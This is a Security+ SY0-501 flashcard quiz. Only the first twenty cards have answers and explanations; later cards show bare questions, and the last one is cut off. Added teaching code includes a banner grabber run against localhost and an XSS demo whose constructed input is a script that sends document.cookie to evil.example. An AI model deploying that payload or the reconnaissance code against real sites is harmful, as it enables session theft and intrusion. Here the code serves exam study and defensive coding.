Security+ SYO-501 - Quiz Flashcards

1
Q
An attacker has decided to attempt to compromise your organization’s network. They have already determined the ISP you are using and know your public IP addresses. They have also performed port scanning to discover your open ports. What communications technique can the hacker now use to identify the applications that are running on each open port facing the Internet?
A.	Credentialed penetration test
B.	Intrusive vulnerability scan
C.	Banner grabbing
D.	Port scanning
A

Q1.1
C. Banner grabbing

C. Banner grabbing is the communications technique an attacker can use to identify the application (and often its version) running on an open Internet-facing port: the attacker connects to the port and records the service's greeting or response headers. Port scanning (D) only finds the open ports; it does not reveal what is listening on them.
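The technique in this card, as an added example (not code from the original flashcard set): a minimal banner grabber plus a parser that pulls the product and version out of the greeting. The sample banners are constructed, and the demo spins up a throwaway local listener that greets with one of them so the whole thing runs offline; no real host is contacted.

```python
import re
import socket
import threading

# Constructed sample banners (not captured from any real host).
SAMPLE_BANNERS = [
    b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.4\r\n",
    b"220 mail.example.com ESMTP Postfix\r\n",
    b"HTTP/1.1 200 OK\r\nServer: nginx/1.24.0\r\n\r\n",
]

# A service's greeting (SSH, SMTP) or response headers (HTTP) usually name the product and version.
BANNER_PATTERNS = [
    ("ssh", re.compile(r"^SSH-(?P<proto>[\d.]+)-(?P<product>[A-Za-z]+)_(?P<version>[\w.]+)")),
    ("smtp", re.compile(r"^220 (?P<host>\S+) ESMTP (?P<product>\w+)(?: (?P<version>[\w.]+))?")),
    ("http", re.compile(r"^Server: (?P<product>[\w-]+)(?:/(?P<version>[\w.]+))?", re.M)),
]


def parse_banner(banner: str) -> dict:
    """Identify the service and, where the banner says so, the product and version."""
    for service, pattern in BANNER_PATTERNS:
        m = pattern.search(banner)
        if m:
            fields = {k: v for k, v in m.groupdict().items() if v}
            fields["service"] = service
            return fields
    return {"service": "unknown"}


def grab_banner(host: str, port: int, probe: bytes = b"", timeout: float = 3.0) -> str:
    """Connect and read the first bytes the service sends.

    SSH and SMTP speak first, so no probe is needed; HTTP only answers a request,
    so pass e.g. b"HEAD / HTTP/1.0\\r\\n\\r\\n" as the probe for a web port.
    A single recv() is enough for a greeting; it is not a full protocol client.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        data = s.recv(1024)
    return data.decode("utf-8", errors="replace")


def _serve_once(banner: bytes, ready: threading.Event, port_holder: list) -> None:
    """Throwaway local listener: accept one client, send the banner, hang up."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))  # ephemeral port, loopback only
    srv.listen(1)
    port_holder.append(srv.getsockname()[1])
    ready.set()
    conn, _ = srv.accept()
    conn.sendall(banner)
    conn.close()
    srv.close()


def demo_local_grab(banner: bytes = SAMPLE_BANNERS[0]) -> dict:
    """Start a local listener that greets with `banner`, grab it, and parse it."""
    ready = threading.Event()
    port_holder: list = []
    t = threading.Thread(target=_serve_once, args=(banner, ready, port_holder), daemon=True)
    t.start()
    ready.wait()
    raw = grab_banner("127.0.0.1", port_holder[0])
    t.join()
    return parse_banner(raw)


if __name__ == "__main__":
    for b in SAMPLE_BANNERS[:2]:
        print(demo_local_grab(b))
```

The parser is the part worth extending: every service you add a pattern for is one more port on which a scanner can name the software, which is exactly why production services should be configured to emit as little version detail as they can.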

2
Q
You are the security manager for a large organization. Your NIDS has reported abnormal levels of network activity and several systems have become unresponsive. While investigating the causes of these issues, you discover a rootkit on your mission-critical database server. What is the best step to take to return this system to production?
A.	Reconstitute the system.
B.	Run an antivirus tool.
C.	Install a HIDS.
D.	Apply vendor patches.
A

Q1.2
A. Reconstitute the system.

A. The only reliable way to return a system to a secure state after a rootkit infection is reconstitution: rebuild it from trusted installation media and restore data from backups taken before the compromise. A rootkit subverts the operating system itself, so an antivirus scan, a HIDS, or vendor patches run on the compromised OS cannot be trusted to find or remove it.

3
Q
If user awareness is overlooked, what attack is more likely to succeed?
A.	Man-in-the-middle
B.	Reverse hash matching
C.	Physical intrusion
D.	Social engineering
A

Q1.3
D. Social engineering

D. Social engineering is more likely to occur if users aren’t properly trained to detect and prevent it. The lack of user awareness training won’t have as much impact on man-in-the-middle, reverse hash-matching, or physical intrusion attacks.

4
Q
A pirated movie-sharing service is discovered operating on company equipment. Administrators do not know who planted the service or who the users are. What technique could be used to attempt to trace the identity of the users?
A.	Typo squatting
B.	Integer overflow
C.	Watering hole attack
D.	Ransomware
A

Q1.4
C. Watering hole attack

C. A watering hole attack plants malicious code on a site the targets are known to visit. Here the pirated movie service itself could be modified so that the systems of subsequent visitors run code that phones home and reveals who they are. Typo squatting, integer overflows, and ransomware do nothing to identify the users.

5
Q
You are the IT security manager for a retail merchant organization that is just going online with an e-commerce website. You hired several programmers to craft the code that is the backbone of your new web sales system. However, you are concerned that while the new code functions well, it might not be secure. You begin to review the code, systems design, and services architecture to track down issues and concerns. Which of the following do you hope to find in order to prevent or protect against XSS?
A.	Input validation
B.	Defensive coding
C.	Allowing script input
D.	Escaping metacharacters
A

Q1.5
A. Input validation
B. Defensive coding
D. Escaping metacharacters

A, B, and D. XSS is prevented by validating input, coding defensively, and escaping metacharacters (encoding <, >, &, and quotes so the browser treats user-supplied data as text rather than markup), together with rejecting script-like input. Allowing script input (C) is the opposite of a protection.
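The three protections from this card side by side, as an added example (not code from the original flashcard set): an allowlist validator for the input, the vulnerable string-concatenation rendering beside the escaped version, and a handler that applies both. The hostile input is constructed, and the display-name rules are an assumption made for the example.

```python
import html
import re

# Constructed attacker input (not from any real incident).
HOSTILE_NAME = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Assumed rule for the example: a display name is letters, digits, spaces, dots, apostrophes, hyphens.
DISPLAY_NAME_RE = re.compile(r"^[A-Za-z0-9 .'\-]{1,40}$")


def validate_display_name(value: str) -> bool:
    """Input validation: allowlist the characters a display name may contain; reject everything else."""
    return DISPLAY_NAME_RE.fullmatch(value) is not None


def render_profile_vulnerable(name: str) -> str:
    """The 'before': untrusted input concatenated straight into HTML (reflected XSS)."""
    return f"<p>Welcome, {name}!</p>"


def render_profile_escaped(name: str) -> str:
    """Escaping metacharacters: encode < > & " ' so the browser sees text, not markup."""
    return f"<p>Welcome, {html.escape(name, quote=True)}!</p>"


def render_attr_escaped(name: str) -> str:
    """Attribute context: same encoding, and the attribute value must be quoted,
    otherwise a space in the input starts a new attribute."""
    return f'<input name="display_name" value="{html.escape(name, quote=True)}">'


def contains_script_tag(rendered: str) -> bool:
    """Crude check used here only to show whether an injected tag survived rendering."""
    return "<script" in rendered.lower()


def handle_profile_update(name: str) -> str:
    """Defensive coding: validate on the way in, escape on the way out regardless,
    and fail closed with a generic error rather than echoing the bad value."""
    if not validate_display_name(name):
        raise ValueError("display name contains disallowed characters")
    return render_profile_escaped(name)


if __name__ == "__main__":
    print(render_profile_vulnerable(HOSTILE_NAME))
    print(render_profile_escaped(HOSTILE_NAME))
```

Output encoding is applied even to values that passed validation: the allowlist can change later, and the encoding costs nothing. The encoding must match the context (element body, quoted attribute, URL, JavaScript string); the same `html.escape` is not safe for a value dropped into an inline script.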

6
Q
What type of virus attempts to disable security features that are focused on preventing malware infection?
A.	Retrovirus
B.	Polymorphic
C.	Companion
D.	Armored
A

Q1.6
A. Retrovirus

A. Retroviruses specifically target antivirus and other anti-malware systems to render them useless, for example by terminating the scanner or corrupting its signature database before the main payload runs.

7
Q
What does the acronym RAT stand for?
A.	Random Access Token
B.	Remote Authentication Testing
C.	Random Authorization Trajectory
D.	Remote Access Trojan
A

Q1.7
D. Remote Access Trojan

D. A RAT is a remote access Trojan. A RAT is a form of malicious code that grants an attacker some level of remote control access to a compromised system.

8
Q
What form of social engineering attack focuses on stealing credentials or identity information from any potential target?
A.	Phishing
B.	Tailgating
C.	Dumpster diving
D.	Logic bomb
A

Q1.8
A. Phishing

A. Phishing is a form of social engineering attack focused on stealing credentials or identity information from any potential target. It is based on the concept of fishing for information. Phishing is employed by attackers to obtain sensitive information such as usernames, passwords, credit card details, or other personally identifiable information by masquerading as a trustworthy entity (a bank, a service provider, or a merchant, for example) in electronic communication (usually email).

9
Q
What type of service attack positions the attacker in the communication path between a client and a server?
A.	Session hijacking
B.	Man-in-the-middle
C.	Amplification
D.	Replay
A

Q1.9
B. Man-in-the-middle

B. A man-in-the-middle attack is a communications eavesdropping attack. Attackers position themselves in the communication stream between a client and server (or any two communicating entities). The client and server believe that they're communicating directly with each other, even over links they consider secured or encrypted, when in fact each is talking to the attacker, who can read and alter the traffic.

10
Q
What form of attack abuses a program’s lack of length limitation on the data it receives before storing the input in memory and can lead to arbitrary code execution?
A.	ARP poisoning
B.	XSS
C.	Domain hijacking
D.	Buffer overflow
A

Q1.10
D. Buffer overflow

D. A buffer overflow occurs when an attacker submits more data to a process than the receiving buffer was sized to hold. Unless the program checks the length of its input, the excess bytes overwrite adjacent memory, which on the stack can include the saved return address; an attacker who controls that value can redirect execution to code of their choosing, running with the privileges of the compromised process. Length checks, bounds-checked library routines, and platform mitigations such as DEP and ASLR reduce the risk.

11
Q
What is a programmatic activity that restructures or reorganizes software code without changing its externally perceived behavior or produced results?
A.	Buffer overflow
B.	Pass the hash
C.	Refactoring
D.	Shimming
A

Q1.11
C. Refactoring

C. Refactoring is restructuring or reorganizing software code without changing its externally perceived behavior or produced results. Refactoring focuses on improving software's nonfunctional elements (quality attributes, nonbehavioral requirements, service requirements, or constraints). Refactoring can improve readability, reduce complexity, ease troubleshooting, and simplify future expansion and extension efforts.

12
Q
What wireless attack is able to trick mobile device users into connecting into its man-in-the-middle style of attack by automatically appearing as if it is a trusted network that they have connected to in the past?
A.	Replay
B.	Evil twin
C.	Bluesnarfing
D.	Disassociation
A

Q1.12
B. Evil twin

B. An evil twin is an attack in which the attacker operates a false access point that clones the identity (SSID and, often, security settings) of a network the victim trusts. Each time a device successfully connects to a wireless network it retains a profile for it and may later probe for that network by name; the evil twin answers those probes, so the device reconnects automatically and all of its traffic passes through the attacker.

13
Q
What type of hacker hacks for a cause or purpose, knowing that they may be identified, apprehended, and prosecuted?
A.	Hacktivist
B.	Script kiddie
C.	Nation-state hacker
D.	Internal attacker
A

Q1.13
A. Hacktivist

A. A hacktivist is someone who uses their hacking skills for a cause or purpose. A hacktivist commits criminal activities for the furtherance of their cause. A hacktivist attacks targets even when they know they will be identified, apprehended, and prosecuted. They do this because they believe their purpose or cause is more important than themselves.

14
Q
When an attacker selects a target, they must perform reconnaissance to learn as much as possible about the systems and their configuration before launching attacks. What is the term for the gathering of information from any publicly available resource, such as websites, social networks, discussion forums, file services, and public databases?
A.	Banner grabbing
B.	Port scanning
C.	Open-source intelligence
D.	Enumeration
A

Q1.14
C. Open-source intelligence

C. Open-source intelligence (OSINT) is the gathering of information from any publicly available resource. This includes websites, social networks, discussion forums, file services, public databases, and other online sources. It also includes non-Internet sources, such as libraries and periodicals.

15
Q
What penetration testing or hacking term refers to the concept of continuing an intrusion after an initial compromise in order to further breach an organization by focusing on new targets that may not have been accessible initially?
A.	Man-in-the-browser
B.	Pivot
C.	Daisy chaining
D.	Shimming
A

Q1.15
B. Pivot

B. In penetration testing (or hacking in general), a pivot is the action or ability to compromise a system and then use the privileges or access gained through that attack to focus attention on another target that may not have been visible or exploitable initially. It is the ability to adjust the focus or the target of an intrusion after an initial foothold is gained.

16
Q
What is the term for an attack or exploit that grants the attacker greater privileges, permissions, or access than what may have been achieved by the initial exploitation?
A.	Hoax
B.	Impersonation
C.	Piggybacking
D.	Privilege escalation
A

Q1.16
D. Privilege escalation

D. Privilege escalation is an attack or exploit that grants the attacker greater privileges, permissions, or access than may have been achieved by the initial exploitation.

17
Q
What type of information-gathering tactics rely on direct interaction with the target while attempting to avoid being detected as malicious?
A.	Passive reconnaissance
B.	Banner grabbing
C.	Active reconnaissance
D.	Social engineering
A

Q1.17
C. Active reconnaissance

C. Active reconnaissance is the idea of collecting information about a target through interactive means. By directly interacting with a target, the attacker can collect accurate and detailed information quickly but at the expense of potentially being identified as an attacker rather than just an innocent, benign, random visitor.

18
Q
What type of test of security controls is performed with an automated vulnerability scanner that seeks to identify weaknesses while listening in on network communications?
A.	Active
B.	Passive
C.	External
D.	Noncredentialed
A

Q1.18
B. Passive

B. A passive test of security controls is being performed when an automated vulnerability scanner seeks to identify weaknesses by listening in on network communications rather than sending probes to the targets. Because it never interacts with the hosts, a passive scan cannot confirm every weakness it infers; an active or credentialed scan is needed to verify.

19
Q
What is the term used to describe systems that are no longer receiving updates and support from their vendors?
A.	Passive
B.	Embedded
C.	End-of-life
D.	Static
A

Q1.19
C. End-of-life

C. End-of-life systems are those that are no longer receiving updates and support from their vendor. If an organization continues to use an end-of-life system, the risk of compromise is high because newly discovered vulnerabilities will never be patched or fixed. It is of utmost importance to move off end-of-life systems in order to maintain a secure environment; where migration is not yet possible, isolate the system and apply compensating controls.

20
Q
What is present on a system for ease of installation and initial configuration in order to minimize support calls from new customers?
A.	Default configuration
B.	Resource exhaustion trigger
C.	Buffer overflow flaw
D.	Collision tool
A

Q1.20
A. Default configuration

A. Default configurations (including default credentials) should never be allowed to remain on a device or within an application. Defaults exist for ease of installation and initial configuration, in order to minimize support calls from new customers, and are therefore publicly documented and known to attackers.

21
Q

You are implementing a new network for a small office environment. The network includes a domain controller, four resource servers, a network printer, a wireless access point, and three dozen client systems. In addition to standard network management devices, such as switches and routers, why would you want to deploy a firewall?
A. To watch for intrusions
B. To control traffic entering and leaving a network
C. To require strong passwords
D. To prevent misuse of company resources

A

Q2.01

22
Q

As the security administrator for a moderate-sized network, you need to deploy security solutions to reduce the risk of a security breach. You elect to install a network-based IDS. However, after deployment you discover that the NIDS is not suitable for detecting which of the following?
A. Email spoofing
B. Denial-of-service attacks
C. Attacks against the network
D. Attacks against an environment that produces significant traffic

A

Q2.02

23
Q
Illegal or unauthorized zone transfers are a significant and direct threat to what type of network server?
A.	Web
B.	DHCP
C.	DNS
D.	Database
A

Q2.03

24
Q
What mechanism of loop protection is based on an element in a protocol header?
A.	Spanning Tree Protocol
B.	Ports
C.	Time to live
D.	Distance vector protocols
A

Q2.04

25
Q
What type of wireless antenna can be used to send or receive signals in any direction?
A.	Cantenna
B.	Yagi
C.	Rubber duck
D.	Panel
A

Q2.05

26
Q
What mechanism of wireless security is based on AES?
A.	TKIP
B.	CCMP
C.	LEAP
D.	WEP
A

Q2.06

27
Q
What technology provides an organization with the best control over BYOD equipment?
A.	Encrypted removable storage
B.	Mobile device management
C.	Geotagging
D.	Application whitelisting
A

Q2.07

28
Q

What is the most effective means to reduce the risk of losing the data on a mobile device, such as a notebook computer?
A. Encrypt the hard drive.
B. Minimize sensitive data stored on the mobile device.
C. Use a cable lock.
D. Define a strong logon password.

A

Q2.08

29
Q
Which security stance will be most successful at preventing malicious software execution?
A.	Deny by exception
B.	Whitelisting
C.	Allow by default
D.	Blacklisting
A

Q2.09

30
Q
LDAP operates over what TCP ports?
A.	636 and 389
B.	110 and 25
C.	443 and 80
D.	20 and 21
A

Q2.10

31
Q
What type of NAC agent is written in a web or mobile language and is temporarily executed on a system only when the specific management page is accessed?
A.	Permanent
B.	Dissolvable
C.	Passive
D.	Stateless
A

Q2.11

32
Q

What is the purpose or use of a media gateway?
A. It is a fictitious environment designed to fool attackers and intruders and lure them away from the private secured network.
B. It is used to connect several network segments and enable traffic from one network segment to traverse into another network segment.
C. It is used to spread or distribute network traffic load across several network links or network devices.
D. It is any device or service that converts data from one communication format to another.

A

Q2.12

33
Q

Which of the following is true regarding an exploitation framework? (Select all that apply.)
A. Is a passive scanner
B. Fully exploits vulnerabilities
C. Only operates in an automated fashion
D. Allows for customization of test elements
E. Represents additional risk to the environment
F. Can only assess systems over IPv4

A

Q2.13

34
Q

What is the purpose of a banner grabbing activity?
A. Detecting the presence of a wireless network
B. Capturing the initial response or welcome message from a network service that may directly or indirectly reveal its identity
C. Preventing access to a network until the client has accepted use terms or fully authenticated
D. Altering the source IP address of an outbound request

A

Q2.14

35
Q

How are effective permissions determined or calculated?
A. Accumulate allows, remove any denials
B. Count the number of users listed in the ACL
C. View the last access time stamp of the asset
D. Review the user’s group memberships

A

Q2.15

36
Q

What is a content filter mechanism that can reduce the possibility of malicious executable code being accepted as input?
A. Checking length
B. Blocking hex characters
C. Escaping metacharacters
D. Filtering on known patterns of malicious content

A

Q2.16

37
Q
What is an example of a PUP?
A.	A backdoor
B.	Unwanted marketing pop-ups
C.	A Trojan horse
D.	A password cracker
A

Q2.17

38
Q
What is the purpose of DEP being present in an operating system?
A.	To block buffer overflows
B.	To prevent social-engineering attacks
C.	To stop ransomware infections
D.	To interrupt backdoor installations
A

Q2.18

39
Q
What is the term used to describe the designation of a specific geographical area that is then used to implement features on mobile devices, which can be defined by GPS coordinates, a wireless indoor positioning system (IPS), or the presence or lack of a specific wireless signal?
A.	Bluesmacking
B.	Geofencing
C.	Banner grabbing
D.	CYOD
A

Q2.19

40
Q

What is the definition of DNSSEC?
A. It is an Internet standard for encrypting and digitally signing email.
B. It can be used as a secure Telnet replacement, it can be used to encrypt protocols similar to TLS, and it can be used as a VPN protocol.
C. It is a standard network-management protocol supported by most network devices and TCP/IP-compliant hosts used to obtain status information, performance data, statistics, and configuration details.
D. It is a security improvement to the existing name resolution infrastructure. The primary function of this tool is to provide reliable authentication between devices when performing resolution operations.

A

Q2.20

41
Q
Which of the following allows the deployment of a publicly accessible web server without compromising the security of the private network?
A.	Intranet
B.	DMZ
C.	Extranet
D.	Switch
A

Q3.01

42
Q
An organization has a high-speed fiber Internet connection that it uses for most of its daily operations, as well as its offsite backup operations. This represents what security problem?
A.	Single point of failure
B.	Redundant connections
C.	Backup generator
D.	Offsite backup storage
A

Q3.02

43
Q

A security template can be used to perform all but which of the following tasks?
A. Capture the security configuration of a master system
B. Apply security settings to a target system
C. Return a target system to its precompromised state
D. Evaluate compliance with security of a target system

A

Q3.03

44
Q
What technique or method can be employed by hackers and researchers to discover unknown flaws or errors in software?
A.	Dictionary attacks
B.	Fuzzing
C.	War dialing
D.	Cross-site request forgery
A

Q3.04

45
Q

What is a security risk of an embedded system that is not commonly found in a standard PC?
A. Power loss
B. Access to the Internet
C. Control of a mechanism in the physical world
D. Software flaws

A

Q3.05

46
Q

To ensure that whole-drive encryption provides the best security possible, which of the following should not be performed?
A. Screen lock the system overnight.
B. Require a boot password to unlock the drive.
C. Lock the system in a safe when it is not in use.
D. Power down the system after use.

A

Q3.06

47
Q
In order to avoid creating a monolithic security structure, organizations should adopt a wide range of security mechanisms. This concept is known as __________.
A.	Defense in depth
B.	Control diversity
C.	Intranet buffering
D.	Sandboxing
A

Q3.07

48
Q
When offering a resource to public users, what means of deployment provides the most protection for a private network?
A.	Intranet
B.	Wireless
C.	Honeynet
D.	DMZ
A

Q3.08

49
Q
When you are implementing a security monitoring system, what element is deployed in order to detect and record activities and events?
A.	Correlation engine
B.	Tap
C.	Sensor
D.	Aggregation switch
A

Q3.09

50
Q
When an enterprise is using numerous guest OSs to operate their primary business operations, what tool or technique can be used to enable communications between guest OSs hosted on different server hardware but keep those communications distinct from standard subnet communications?
A.	VPN
B.	SDN
C.	EMP
D.	FDE
A

Q3.10

51
Q
What type of OS is designed for public end-user access and is locked down so that only preauthorized software products and functions are enabled?
A.	Kiosk
B.	Appliance
C.	Mobile
D.	Workstation
A

Q3.11

52
Q
When you need to test new software whose origin and supply chain are unknown or untrusted, what tool can you use to minimize the risk to your network or workstation?
A.	Hardware security module
B.	UEFI
C.	Sandboxing
D.	SDN
A

Q3.12

53
Q
What is the concept of a computer implemented as part of a larger system that is typically designed around a limited set of specific functions (such as management, monitoring, and control) in relation to the larger product of which it’s a component?
A.	IoT
B.	Application appliance
C.	SoC
D.	Embedded system
A

Q3.13

54
Q
What is an industrial control system (ICS) that provides computer management and control over industrial processes and machines?
A.	SCADA
B.	HSM
C.	OCSP
D.	MFD
A

Q3.14

55
Q
Which SDLC model is based around adaptive development where focusing on a working product and fulfilling customer needs is prioritized over rigid adherence to a process, use of specific tools, and detailed documentation?
A.	Waterfall
B.	Agile
C.	Spiral
D.	Ad hoc
A

Q3.15

56
Q
When an organization wishes to automate many elements and functions of IT management, such as development, operations, security, and quality assurance, they are likely to be implementing which of the following?
A.	SCADA
B.	UTM
C.	IaaS
D.	DevOps
A

Q3.16

57
Q
What is not a cloud security benefit or protection?
A.	CASB
B.	SECaaS
C.	VM sprawl
D.	VM isolation
A

Q3.17

58
Q
What form of cloud service provides the customer with the ability to run their own custom code but does not require that they manage the execution environment or operating system?
A.	SaaS
B.	PaaS
C.	IaaS
D.	SECaaS
A

Q3.18

59
Q
What recovery mechanism is used to return a system back to a previously operating condition when a new software install corrupts the operating system?
A.	Revert to known state
B.	Roll back to known configuration
C.	Live boot media
D.	Template
A

Q3.19

60
Q
What type of security mechanism can be used to prevent a vehicle from damaging a facility?
A.	Fencing
B.	Lighting
C.	Bollard
D.	Access cards
A

Q3.20

61
Q
What method of access control is best suited for environments with a high rate of employee turnover?
A.	MAC
B.	DAC
C.	RBAC
D.	ACL
A

Q4.01

62
Q
What mechanism is used to support the exchange of authentication and authorization details between systems, services, and devices?
A.	Biometric
B.	Two-factor authentication
C.	SAML
D.	LDAP
A

Q4.02

63
Q
Which is the strongest form of password?
A.	More than eight characters
B.	One-time use
C.	Static
D.	Different types of keyboard characters
A

Q4.03

64
Q
Which of the following technologies can be used to add an additional layer of protection between a directory services–based network and remote clients?
A.	SMTP
B.	RADIUS
C.	PGP
D.	VLAN
A

Q4.04

65
Q

Which of the following is not a benefit of single sign-on?
A. The ability to browse multiple systems
B. Fewer usernames and passwords to memorize
C. More granular access control
D. Stronger passwords

A

Q4.05

66
Q
Federation is a means to accomplish __________.
A.	Accountability logging
B.	ACL verification
C.	Single sign-on
D.	Trusted OS hardening
A

Q4.06

67
Q
You have been tasked with installing new kiosk systems for use in the retail area of your company’s store. The company elected to use standard equipment and an open-source Linux operating system. You are concerned that everyone will know the default password for the root account. What aspect of the kiosk should be adjusted to prevent unauthorized entities from being able to make system changes?
A.	Authorization
B.	Accounting
C.	Authentication
D.	Auditing
A

Q4.07

68
Q
Your company has several shifts of workers. Overtime and changing shifts is prohibited due to the nature of the data and the requirements of the contract. To ensure that workers are able to log into the IT system only during their assigned shifts, you should implement what type of control?
A.	Multifactor authentication
B.	Time-of-day restrictions
C.	Location restrictions
D.	Single sign-on
A

Q4.08

69
Q

Place the following steps (represented by the letters A through I) in the correct order:
A. The KDC verifies that the client has a valid TGT and then issues an ST to the client. The ST includes a time stamp that indicates its valid lifetime.
B. The client receives the TGT. At this point, the subject is an authenticated principal in the Kerberos realm.
C. The client sends the ST to the network server that hosts the desired resource.
D. The Kerberos client system encrypts the password and transmits the protected credentials to the KDC.
E. The subject requests access to resources on a network server. This causes the client to request a service ticket (ST) from the KDC.
F. The subject provides logon credentials.
G. The network server verifies the ST. If it’s verified, it initiates a communication session with the client. From this point forward, Kerberos is no longer involved.
H. The KDC verifies the credentials and then creates a ticket-granting ticket (TGT)—a hashed form of the subject’s password with the addition of a time stamp that indicates a valid lifetime. The TGT is encrypted and sent to the client.
I. The client receives the ST.
1. F, D, H, B, E, A, I, C, G
2. H, I, C, D, G, F, E, A, B
3. A, B, C, D, E, F, G, H, I
4. I, A, E, B, C, G, F, H, D

A

Q4.09

70
Q
Your company has recently purchased Cisco networking equipment. When you are setting up to allow remote access, what means of AAA service is now available to your organization?
A.	RADIUS
B.	X.500
C.	TACACS+
D.	X.509 v3
A

Q4.10

71
Q
Your organization has recently decided to allow some employees to work from home two days a week. While configuring the network to allow for remote access, you realize the risk this poses to the organization’s infrastructure. What mechanism can be implemented to provide an additional barrier against remote access abuse?
A.	Kerberos
B.	Single sign-on
C.	Stronger authorization
D.	RADIUS
A

Q4.11

72
Q
You are developing a smart app that will control a new IoT device that automates blinking light fixtures in time with the beat of music. You want to make using the device as simple as possible, so you want to adopt an authentication technique that is seamless for the user. Which technology should you integrate into your app and device?
A.	OpenID Connect
B.	Shibboleth
C.	A secure token
D.	Role-based access control
A

Q4.12

73
Q

How are effective permissions calculated?
A. Count the number of allows, subtract the number of denials
B. Accumulate allows, remove denials
C. Look at the user’s clearance level
D. Count the number of groups the user is a member of

A

Q4.13

74
Q
What form of authorization is based on a scheme of characteristics related to the user, the object, the system, the application, the network, the service, time of day, or even other subjective environmental concerns?
A.	RBAC
B.	MAC
C.	DAC
D.	ABAC
A

Q4.14

75
Q
Your organization wants to integrate a biometric factor into the existing multifactor authentication system. To ensure alignment with company priorities, what tool should be used in selecting which type or form of biometric to use?
A.	CER comparison
B.	OAuth verifier
C.	Zephyr analysis chart
D.	Federation assessment
A

Q4.15

76
Q
What type of biometric error increases as the sensitivity of the device increases?
A.	FAR
B.	FRR
C.	CER
D.	False positive
A

Q4.16

77
Q
You are installing a new network service application. The application requires a variety of permissions on several resources and even a few advanced user rights in order to operate properly. Which type of account should be created for this application to operate under?
A.	Service
B.	User
C.	Privileged
D.	Generic
A

Q4.17

78
Q
Failing to perform regular permissions auditing can result in a violation of what security concept?
A.	Implicit deny
B.	Security by obscurity
C.	Least privilege
D.	Diversity of defense
A

Q4.18

79
Q
What type of access management can involve restrictions based on MAC address, IP address, OS version, patch level, and/or subnet in addition to logical or geographical position?
A.	Geography-based access control
B.	Physical access control
C.	Logical access control
D.	Location-based access control
A

Q4.19

80
Q

Which of the following is a recommended basis for reliable password complexity?
A. Minimum of eight characters; include representations of at least three of the four character types
B. Allow for a maximum of three failed logon attempts before locking the account for 15 minutes
C. Require that a password remain static for at least three days and prevent the reuse of the five most recently used passwords
D. Require that each administrator have a normal user account in addition to a privileged account

A

Q4.20

81
Q
Which of the following risk assessment formulas represents the total potential loss a company may experience within a single year due to a specific risk to an asset?
A.	EF
B.	SLE
C.	ARO
D.	ALE
A

Q5.01

82
Q
Which of the following is more formal than a handshake agreement but not a legal binding contract?
A.	SLA
B.	BIA
C.	DLP
D.	MOU
A

Q5.02

83
Q
When a user signs a(n) __________, it's a form of consent to the monitoring and auditing processes used by the organization.
A.	Acceptable use policy
B.	Privacy policy
C.	Separation of duties policy
D.	Code of ethics policy
A

Q5.03

84
Q

When is business continuity needed?
A. When new software is distributed
B. When business processes are interrupted
C. When a user steals company data
D. When business processes are threatened

A

Q5.04

85
Q

You run a full backup every Monday. You also run a differential backup every other day of the week. You experience a drive failure on Friday. Which of the following restoration procedures should you use to restore data to the replacement drive?
A. Restore the full backup and then each differential backup.
B. Restore the full backup and then the last differential backup.
C. Restore the differential backup.
D. Restore the full backup.

A

Q5.05
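Worked example for the full-plus-differential question above. This is added illustration, not part of the quiz: it models a week of backups on a constructed set of files so you can see why each restore option does or does not reproduce the data. A real differential job keys off the archive bit; this simulation compares file contents against the last full backup instead, which is the same rule.

```python
from copy import deepcopy


def take_full(files):
    """Full backup: a complete snapshot of every file."""
    return {"kind": "full", "data": deepcopy(files)}


def take_differential(files, full):
    """Differential backup: every file that differs from the last FULL backup,
    not from the last differential. Each differential therefore also contains
    the previous one's changes, so the newest supersedes the older ones."""
    changed = {name: content for name, content in files.items()
               if full["data"].get(name) != content}
    return {"kind": "differential", "data": deepcopy(changed)}


def restore(full, differentials):
    """Rebuild the file set from a full backup plus the given differentials,
    applied in order."""
    files = deepcopy(full["data"])
    for diff in differentials:
        files.update(diff["data"])
    return files


def simulate_week():
    """Constructed scenario: Monday full, differentials Tue-Thu, drive dies Friday.
    Returns the full backup, the differentials, and the last backed-up state."""
    live = {"config.ini": "base", "ledger.db": "v1", "notes.txt": "mon"}
    monday_full = take_full(live)
    live["notes.txt"] = "tue"                       # Tuesday edit
    tuesday = take_differential(live, monday_full)
    live["ledger.db"] = "v2"                        # Wednesday edits
    live["report.doc"] = "wed"
    wednesday = take_differential(live, monday_full)
    live["policy.pdf"] = "thu"                      # Thursday edit
    thursday = take_differential(live, monday_full)
    return monday_full, [tuesday, wednesday, thursday], deepcopy(live)


def compare_strategies():
    """Which restore procedures reproduce the last backed-up state."""
    full, diffs, expected = simulate_week()
    empty_full = {"kind": "full", "data": {}}
    return {
        "full_only": restore(full, []) == expected,                       # option D
        "last_diff_only": restore(empty_full, [diffs[-1]]) == expected,   # option C
        "full_plus_last_diff": restore(full, [diffs[-1]]) == expected,    # option B
        "full_plus_every_diff": restore(full, diffs) == expected,         # option A
        "files_per_diff": [len(d["data"]) for d in diffs],                # grows each day
    }
```

Running `compare_strategies()` shows the last differential alone lacks the files that never changed, the full alone is stale, and full plus every differential does rebuild the data but re-applies changes the last differential already contains; full plus the most recent differential is the minimal correct sequence. Note that whatever changed on Friday before the failure is lost under every option, because the newest backup is Thursday's.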

86
Q
Which of the following is a security control type that is not usually associated with or assigned to a security guard?
A.	Preventive
B.	Detective
C.	Corrective
D.	Administrative
A

Q5.06

87
Q
You are the security manager for a brokerage firm. New company policy requires that all administrators be evaluated for compliance or violations in regard to adherence to the security policy and ethics agreement. Which of the following is a technique that can be used to accomplish this task?
A.	Separation of duties
B.	Clean desk
C.	Background checks
D.	Mandatory vacations
A

Q5.07

88
Q
Separation of duties has recently been implemented at your organization. Due to the size of the company, a single person has been assigned to each compartmented management area. There is some concern that over time the company will be at risk of being unable to perform critical tasks if one or more administrators are unavailable due to illness, vacation, retirement, or termination. What tool can be used to reduce this risk?
A.	Job rotation
B.	Principle of least privilege
C.	Exit interviews
D.	Awareness training
A

Q5.08

89
Q
Downtime is a violation of availability. Avoiding downtime is an essential tenet of your organization’s mission and security policy. What element of system management and maintenance needs to be monitored and tracked in order to avoid device failure resulting in unplanned downtime?
A.	RTO
B.	MTTF
C.	ALE
D.	NDA
A

Q5.09

90
Q

You are the network manager for a large organization. Over the weekend a storm caused a power surge, which damaged the main router between the company network and the Internet service. On Monday morning you realize that the entire intranet is unable to connect to any outside resource and mission-critical tasks are not functioning. What is the problem that the organization is experiencing?
